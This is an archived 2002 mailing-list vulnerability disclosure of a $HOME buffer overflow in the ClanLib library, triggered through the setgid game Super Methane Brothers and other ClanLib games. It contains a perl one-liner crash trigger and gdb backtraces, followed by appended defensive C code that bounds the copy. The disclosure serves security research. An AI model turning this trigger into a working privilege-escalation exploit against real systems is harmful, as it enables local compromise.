Vulnerability Development mailing list archives

Clanlib overflow / Super Methane Brothers overflow


From: KF <dotslash () snosoft com>
Date: Mon, 14 Jan 2002 19:56:09 -0500

Charles stayed up all night and found a hole in Eterm so I felt obligated to stay up all night and find something else wrong on my box too. In doing so I found an overflow in a game included with Mandrake 8.1 called Super Methane Brothers. $HOME=<bof here> then run /usr/games/methane. In turn that caused me to find an overflow in ClanLib. So thanks
for staying up late last night core!

This was all tested against some rpms made from the mandrake src with "rpm --rebuild"
libclanlib0-0.4.4-28mdk
libclanlib0-magick-0.4.4-28mdk
clanlib-0.4.4-28mdk
libclanlib0-gl-0.4.4-28mdk
libclanlib0-png-0.4.4-28mdk
libclanlib0-devel-0.4.4-28mdk
libclanlib1-0.5.1-4mdk
libclanlib0-mikmod-0.4.4-28mdk

It looks like the buffer overflow in /usr/games/methane is a library overflow in clanlib
instead. I checked some other clanlib based games to prove this.

[root@linuxppc root]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc root]# /usr/games/methane
Super Methane Brothers
Licensed using the GNU General Public License Version 2
http://www.methane.fsnet.co.uk
...
This game requires ClanLib (v0.5.0) and Hermes (v1.3.3) http://clanlib.org/hermes
(High Scores written to /var/lib/games/methanescores)
Segmentation fault

[root@linuxppc root]# ls -al /usr/games/methane
-rwxr-sr-x    1 root     games     1978056 Nov 13 06:36 /usr/games/methane*

This was default on my Intel Mandrake 8.1 box. I overwrote edx and ecx with my own data. I don't do Intel so I didn't try any further. I got the packages for ppc and it was no fun to play with so I decided to look at some other clanlib based games to at least verify the library issue. I think the below link has info on the function causing the problem.

http://dark.x.dtu.dk/~sphair/cvs/Libs/ClanLib-0.5/Documentation/Reference/html/CL_SetupDisplay.html#2325

Here are some more examples of the clanlib overflow.

StarWar-0.0.1d.tar.gz
[root@linuxppc StarWar-0.0.1]# export HOME=`perl -e 'print "A" x 9000'`
[root@linuxppc StarWar-0.0.1]# src/starwar
Segmentation fault (core dumped)

This is the same place methane cored on my Intel box...
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
(gdb) bt
#0  0x0fc81b78 in strcpy () from /lib/libc.so.6
#1 0x0ff89554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
#2  0x0ff87014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3 0x0ff83b28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
#4  0x1000d37c in InitDisplayApp::main ()
#5  0x0ff85270 in main () from /usr/lib/libclanCore.so.0
#6  0x0fc1eb90 in __libc_start_main () from /lib/libc.so.6

kwirk-0.0.16.tar.gz
[root@linuxppc Kwirk]# ./kwirk
Segmentation fault (core dumped)
(gdb)
#0  0x0fd36b78 in strcpy () from /lib/libc.so.6
#1 0x0fef0554 in FileConfig::LocalConfigFile () from /usr/lib/libclanCore.so.0
#2  0x0feee014 in FileConfig::FileConfig () from /usr/lib/libclanCore.so.0
#3 0x0feeab28 in CL_SetupCore::init_display () from /usr/lib/libclanCore.so.0
#4  0x1001e8f4 in TKwirk::init_modules (this=0x10054104) at kwirk.cpp:24
#5  0x0feec1fc in main () from /usr/lib/libclanCore.so.0
#6  0x0fcd3b90 in __libc_start_main () from /lib/libc.so.6

clankanoid-0.1.tgz
[root@linuxppc clanka]# ./clankanoid
Segmentation fault (core dumped)

I think you get the idea.
I would imagine about any game on http://www.clanlib.org/links.html would have this issue also. I'm sure a few clanlib games are suid like the one that came with Mandrake 8.1 (methane).
-KF
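The backtraces above all end in strcpy() called from FileConfig::LocalConfigFile, i.e. the library copies $HOME into a fixed-size buffer without checking its length. The C below is an added example written for this archive page, not ClanLib's code and not from KF's post: it shows the bounded way to build a per-user config path, rejecting a missing or oversized HOME instead of overrunning the destination. The function names local_config_path and config_path_from_env, the suffix /.clanlib/config and the 9000-byte test value (mirroring the perl one-liner in the post) are assumptions for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed suffix for the per-user config file; ClanLib's real path is not
 * given in the post, so this is a placeholder. */
#define CONFIG_SUFFIX "/.clanlib/config"

/* Build "<home>" + CONFIG_SUFFIX into out[outsz].
 * Returns 0 on success. Returns -1 (and leaves out empty) when home is
 * NULL or empty, when out is unusable, or when the result would not fit.
 * This is the hypothetical safe counterpart of the unbounded strcpy() seen
 * in the backtraces: the destination size is honoured, never the input's. */
int local_config_path(const char *home, char *out, size_t outsz)
{
    if (out == NULL || outsz == 0)
        return -1;
    out[0] = '\0';
    if (home == NULL || home[0] == '\0')
        return -1;

    /* Length check before any copy: +1 for the terminating NUL. */
    size_t need = strlen(home) + strlen(CONFIG_SUFFIX) + 1;
    if (need > outsz)
        return -1;

    /* The bound is still passed to snprintf so a later edit that drops the
     * check above cannot silently reintroduce the overflow. */
    int n = snprintf(out, outsz, "%s%s", home, CONFIG_SUFFIX);
    if (n < 0 || (size_t)n >= outsz) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

/* Same thing read from the process environment, the way a library would
 * use it at startup. Untrusted: $HOME is attacker-controlled for a
 * setuid/setgid binary, so the length check above is the whole point. */
int config_path_from_env(char *out, size_t outsz)
{
    return local_config_path(getenv("HOME"), out, outsz);
}

/* Self-check 1: a normal HOME produces the expected path. Returns 1 on pass. */
int check_normal_home(void)
{
    char path[256];
    if (local_config_path("/home/kf", path, sizeof path) != 0)
        return 0;
    return strcmp(path, "/home/kf/.clanlib/config") == 0;
}

/* Self-check 2: a constructed 9000-byte HOME (like the post's perl
 * one-liner) is rejected and the output buffer is left empty. Returns 1 on pass. */
int check_oversized_home(void)
{
    static char big[9001];
    char path[256];
    memset(big, 'A', 9000);
    big[9000] = '\0';
    if (local_config_path(big, path, sizeof path) != -1)
        return 0;
    return path[0] == '\0';
}

int main(void)
{
    char path[256];
    printf("normal HOME:    %s\n", check_normal_home() ? "ok" : "FAIL");
    printf("9000-byte HOME: %s\n", check_oversized_home() ? "rejected" : "FAIL");
    printf("current $HOME:  %s\n",
           config_path_from_env(path, sizeof path) == 0 ? path : "(rejected)");
    return 0;
}
```

The detection side of this is simple: a crash in strcpy() with an environment variable on the stack is the signature to look for in core dumps from setuid/setgid games, and the fix is to make the copy honour the destination size as above.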

